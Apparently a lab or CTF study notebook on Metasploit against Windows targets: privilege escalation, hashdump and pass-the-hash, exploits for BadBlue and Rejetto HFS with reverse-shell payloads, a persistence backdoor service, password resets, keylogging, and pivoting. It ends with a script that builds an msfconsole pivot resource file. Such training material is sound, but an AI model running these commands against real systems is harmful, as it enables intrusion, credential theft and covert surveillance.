search migrate
use post/windows/manage/migrate
info
# Description:
# This module will migrate a Meterpreter session from one process to
# another. A given process PID to migrate to or the module can spawn
# one and migrate to that newly spawned process.
set SESSION 1
run
# It will not migrate if the session is already in an x64 process
📌 Application versions are very useful information: a known-vulnerable version can lead straight to a privilege escalation.
loot
The /root/.msf4/loot/ folder can be handy.
Check Antivirus
search type:post platform:windows enum_av
use post/windows/gather/enum_av_excluded
info
# Description:
# This module will enumerate the file, directory, process and
# extension-based exclusions from supported AV products, which
# currently includes Microsoft Defender, Microsoft Security
# Essentials/Antimalware, and Symantec Endpoint Protection.
set SESSION 1
run
search enum_patches
use post/windows/gather/enum_patches
info
# Description:
# This module will attempt to enumerate which patches are applied to a
# windows system based on the result of the WMI query: SELECT HotFixID
# FROM Win32_QuickFixEngineering
# A KB list can be specified
set SESSION 1
run
# If this doesn't work, migrate into a process running as "NT AUTHORITY\SYSTEM" (e.g. a system service) and retry
This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
getuid
Server username: VICTIM\admin
getsystem
# getsystem fails
getprivs
Enabled Process Privileges
==========================
Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
# The "admin" user may be part of the Administrators group
shell
On the Windows target cmd
net users
admin Administrator Guest
net localgroup administrators
Members
-------------
admin
Administrator
# Yes, "admin" is part of the Administrators group,
# but the Meterpreter session does not have administrative privileges:
# with UAC enabled the session runs with the filtered (medium-integrity) token,
# so a UAC bypass is needed to reach the full administrator token
exit
[*] Started reverse TCP handler on 10.10.24.6:5533
[+] Windows 2012 R2 (6.3 Build 9600). may be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[-] Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System
[*] Exploit completed, but no session was created.
# The module's checks passed; only the architecture was wrong.
# Select the x64 target and an x64 payload (e.g. windows/x64/meterpreter/reverse_tcp), then run again.
getuid
Server username: NT AUTHORITY\LOCAL SERVICE
getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
# SeImpersonatePrivilege: token impersonation can be performed (this is what getsystem's named-pipe technique relies on)
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeSystemtimePrivilege
SeTimeZonePrivilege
hashdump
# Quick check of whether the session has sufficient privileges: hashdump only succeeds with SYSTEM-level access
80/tcp open http BadBlue httpd 2.7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
Exploitation
search badblue 2.7
use exploit/windows/http/badblue_passthru
set TARGET BadBlue\ EE\ 2.7\ Universal
run
sysinfo
Computer : ATTACKDEFENSE
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
getuid
Server username: ATTACKDEFENSE\Administrator
Privilege Escalation
pgrep lsass
migrate 780
getuid
Server username: NT AUTHORITY\SYSTEM
Use PsExec to log in as the Administrator user with its password hash (pass-the-hash: the LM:NT hash pair is the one obtained with hashdump from the SYSTEM session, no cleartext password needed)
exit
search psexec
use exploit/windows/smb/psexec
options
set payload windows/x64/meterpreter/reverse_tcp
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:e3c61a68f1b89ee6c8ba9507378dc88d
exploit
getuid
Server username: NT AUTHORITY\SYSTEM
sysinfo
Computer : ATTACKDEFENSE
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
80/tcp open http HttpFileServer httpd 2.3
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
Exploitation
search type:exploit name:rejetto
use exploit/windows/http/rejetto_hfs_exec
options
set payload windows/x64/meterpreter/reverse_tcp
run
sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
getuid
Server username: WIN-OMCNBKR66MN\Administrator
Persistence
❗ In order to set up persistence, administrative privileges are required.
background
search platform:windows persistence
use exploit/windows/local/persistence_service
info
# Description:
# This Module will generate and upload an executable to a remote host,
# next will make it a persistent service. It will create a new service
# which will start the payload whenever the service is running. Admin
# or system privilege is required.
set payload windows/meterpreter/reverse_tcp
set SESSION 1
run
Access is now persistent: once the backdoor is installed it keeps running as a service (across restarts), and a multi/handler listening on the LHOST/LPORT configured for the persistence module will receive a connection from that service every time it starts.
exit
# Kill all sessions
sessions -K
sessions
# No active sessions.
Regain access to the system
use multi/handler
options
# Set the options as specified for the PERSISTENCE_SERVICE Exploit
set payload windows/meterpreter/reverse_tcp
set LHOST eth1
set LPORT 4444
run
80/tcp open http BadBlue httpd 2.7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
# RDP 3389 is disabled
Exploitation
use exploit/windows/http/badblue_passthru
run
sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x86/windows
getuid
Server username: NT AUTHORITY\SYSTEM
background
Enable RDP
search enable_rdp
use post/windows/manage/enable_rdp
options
sessions
set SESSION 1
run
# Verify port 3389 is open
db_nmap -p 3389 10.2.21.205
3389/tcp open ms-wbt-server
To access RDP, login credentials are necessary
sessions
sessions 1
shell
net users
Administrator Guest
Change the Administrator user's password (not recommended on a real-world system)
📌 During a standard Pentest, create another user account, add it to the Administrators group and utilize that one.
net user administrator p4ssword_12344321
exit
Legitimate credentials are now: administrator:p4ssword_12344321
sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
getuid
Server username: WIN-OMCNBKR66MN\Administrator
shell
cd /
type flag.txt
Reveal Flag: 🚩
70a569da306697d64fc6c19afea37d94
Keylogging
pgrep explorer
migrate 2420
help
# Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user's desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Open a Notepad session on the Target machine.
On the Attacker machine, start the keystroke capture
keyscan_start
Starting the keystroke sniffer ...
Input some text into the target machine
Back on the attacker machine, dump the keystroke buffer with keyscan_dump to read the captured text (keyscan_stop ends the capture)
Pivoting technique with a network route to the internal network's subnet
ping 10.2.30.252
PING 10.2.30.252 (10.2.30.252) 56(84) bytes of data.
64 bytes from 10.2.30.252: icmp_seq=1 ttl=125 time=2.25 ms
64 bytes from 10.2.30.252: icmp_seq=2 ttl=125 time=1.99 ms
ping 10.2.21.166
PING 10.2.21.166 (10.2.21.166) 56(84) bytes of data.
# No response from target2
service postgresql start && msfconsole -q
db_status
workspace -a Pivoting
db_nmap -sV 10.2.30.252
Exploitation
search type:exploit name:rejetto
use exploit/windows/http/rejetto_hfs_exec
options
set RHOSTS 10.2.30.252
run
sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
getuid
Server username: WIN-OMCNBKR66MN\Administrator
ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 12
============
Name : AWS PV Network Device #0
Hardware MAC : 02:2a:6e:86:47:fc
MTU : 9001
IPv4 Address : 10.2.30.252 #
IPv4 Netmask : 255.255.240.0
IPv6 Address : fe80::9c0b:f00a:d8b4:f04f
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 24
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:a02:1efc
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Target2 is on the same Target1 subnet - 10.2.16.0/20 (look at the Interface 12)
10.2.16.0/20 = from 10.2.16.1 to 10.2.31.254
Pivoting
From the attacker's machine, a route through target1 (session 1) into the 10.2.16.0/20 subnet is needed to run MSF modules against target2
run autoroute -s 10.2.16.0/20
# The subnet must be given by its network address: 10.2.30.252 with netmask 255.255.240.0 is 10.2.16.0/20
# (10.2.30.0/20 names a host inside that range, not the network, and a route keyed on it may not match target2).
# The autoroute meterpreter script is deprecated; post/multi/manage/autoroute adds the same route.
Now, the 10.2.16.0/20 subnet can be reached by msfconsole modules through session 1
background
sessions -n target-1 -i 1
Scan for open ports on the target2 system - 10.2.21.166
search portscan
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.2.21.166
set PORTS 1-100
run
📌 The route is only applicable to MSFconsole, not outside of it
Port Forwarding
To run nmap (or any tool outside msfconsole) against target2, a port forward needs to be set up from the Meterpreter session with portfwd.
e.g. forward target2's remote port 80 to a local port on the attacker machine; scanning that local port then gives service version enumeration of the target2 service
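The following script is an added example, not part of the original notes. It shows the two checks a practitioner wants before pivoting: deriving the network address of target1's subnet from its ipconfig values (the step that produces 10.2.16.0/20 rather than 10.2.30.0/20), and verifying that target2 really sits inside that network before the route is added. It then emits a msfconsole resource script that adds the route through session 1, port-scans target2 through it and forwards target2's port 80 to a local port for nmap. Assumed values (taken from the notes above, used here as placeholders): session 1 is the Meterpreter on target1 (10.2.30.252, netmask 255.255.240.0), target2 is 10.2.21.166, and 8080 is the local forward port; the output path under $TMPDIR is also an assumption.

```shell
#!/bin/sh
# Added example (not from the original notes): compute the pivot subnet from
# target1's ipconfig values, check target2 is inside it, and generate a
# msfconsole resource script for autoroute + portscan + portfwd.
# Assumed: session 1 = target1 (10.2.30.252/255.255.240.0), target2 = 10.2.21.166,
# local forward port 8080.

# ip_to_int 10.2.30.252 -> the address as a decimal 32-bit value
ip_to_int() {
  set -- $(printf '%s' "$1" | tr . ' ')
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# int_to_ip <decimal> -> dotted quad
int_to_ip() {
  echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# mask_to_prefix 255.255.240.0 -> 20 (number of set bits in the mask)
mask_to_prefix() {
  m=$(ip_to_int "$1"); n=0
  while [ "$m" -ne 0 ]; do
    n=$(( n + (m & 1) )); m=$(( m >> 1 ))
  done
  echo "$n"
}

# network_cidr <host-ip> <netmask> -> <network>/<prefix>
# network_cidr 10.2.30.252 255.255.240.0 -> 10.2.16.0/20
network_cidr() {
  ip=$(ip_to_int "$1"); mask=$(ip_to_int "$2")
  echo "$(int_to_ip $(( ip & mask )))/$(mask_to_prefix "$2")"
}

# in_subnet <host-ip> <network>/<prefix> -> exit status 0 if the host is inside the network
in_subnet() {
  host=$(ip_to_int "$1"); net=${2%/*}; prefix=${2#*/}
  mask=$(( (4294967295 << (32 - prefix)) & 4294967295 ))
  [ $(( host & mask )) -eq $(ip_to_int "$net") ]
}

# write_pivot_rc <target1-ip> <target1-netmask> <target2-ip> <out.rc>
# Refuses to emit a route that would not cover target2.
write_pivot_rc() {
  net=$(network_cidr "$1" "$2")
  in_subnet "$3" "$net" || { echo "target2 $3 is outside $net; the route would not match it" >&2; return 1; }
  subnet=${net%/*}
  cat > "$4" <<EOF
# generated pivot script: msfconsole -q -r $4
# 1. route $net through session 1 (same effect as "run autoroute -s $net" inside the session)
use post/multi/manage/autoroute
set SESSION 1
set CMD add
set SUBNET $subnet
set NETMASK $2
run
route print
# 2. scan target2 through the route (only msf modules use it; nmap cannot)
use auxiliary/scanner/portscan/tcp
set RHOSTS $3
set PORTS 1-100
run
# 3. forward target2's port 80 to local port 8080 so tools outside msf can reach it
sessions -C "portfwd add -l 8080 -p 80 -r $3" -i 1
EOF
}

# demo with the values from these notes (assumed output path)
rc="${TMPDIR:-/tmp}/pivot.rc"
write_pivot_rc 10.2.30.252 255.255.240.0 10.2.21.166 "$rc" && cat "$rc"
# afterwards, outside msfconsole:  nmap -sV -p 8080 127.0.0.1
```

The in_subnet guard is the point of the script: a route keyed on the wrong network address silently sends nothing through the pivot, and the portscan module then reports target2 as closed rather than unreachable. Once the resource script has run, nmap against 127.0.0.1:8080 fingerprints target2's web service through the Meterpreter forward.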